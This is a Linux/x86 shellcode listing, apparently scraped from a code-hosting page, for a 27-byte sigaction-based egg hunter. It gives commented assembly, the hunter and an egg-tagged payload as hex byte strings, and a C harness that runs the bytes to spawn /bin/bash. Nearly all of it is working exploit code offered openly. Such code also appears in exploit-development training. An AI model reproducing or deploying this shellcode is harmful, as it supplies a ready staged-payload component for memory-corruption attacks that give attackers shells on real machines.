56 lines
No EOL
1.1 KiB
C
56 lines
No EOL
1.1 KiB
C
/*
|
|
# Title: Linux/x86 - Egghunter + sigaction-based Shellcode (27 bytes)
|
|
# Author:Valbrux
|
|
# Date: 2018-09-19
|
|
# This exploit is a dirty-slow but small version of the sigaction-based egg hunter shellcode
|
|
|
|
global _start
|
|
|
|
section .text
|
|
|
|
;zeroing ecx
|
|
xor ecx,ecx
|
|
|
|
_start:
|
|
;increment
|
|
inc ecx
|
|
;sigaction syscall number
|
|
push byte 67
|
|
pop eax
|
|
;executing syscall
|
|
int 0x80
|
|
;if EFAULT
|
|
cmp al,0xf2
|
|
;page alignment
|
|
jz _start
|
|
;moving EGG
|
|
mov eax,0x50905090
|
|
;current address
|
|
mov edi,ecx
|
|
;checking current address with EGG two times
|
|
scasd
|
|
jnz _start
|
|
scasd
|
|
jnz _start
|
|
;if equals jump to shellcode
|
|
jmp edi
|
|
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#define EGG "\x90\x50\x90\x50"
|
|
|
|
unsigned char code[] = EGG EGG"\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
|
|
|
|
//27 Bytes
|
|
unsigned char egg[] = "\x31\xc9\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf6\xb8"EGG"\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";
|
|
|
|
main()
|
|
{
|
|
printf("Egg length: %d\n",strlen(egg));
|
|
printf("Shellcode lenght: %d\n",strlen(code));
|
|
int (*ret)() = (int(*)())egg;
|
|
ret();
|
|
|
|
} |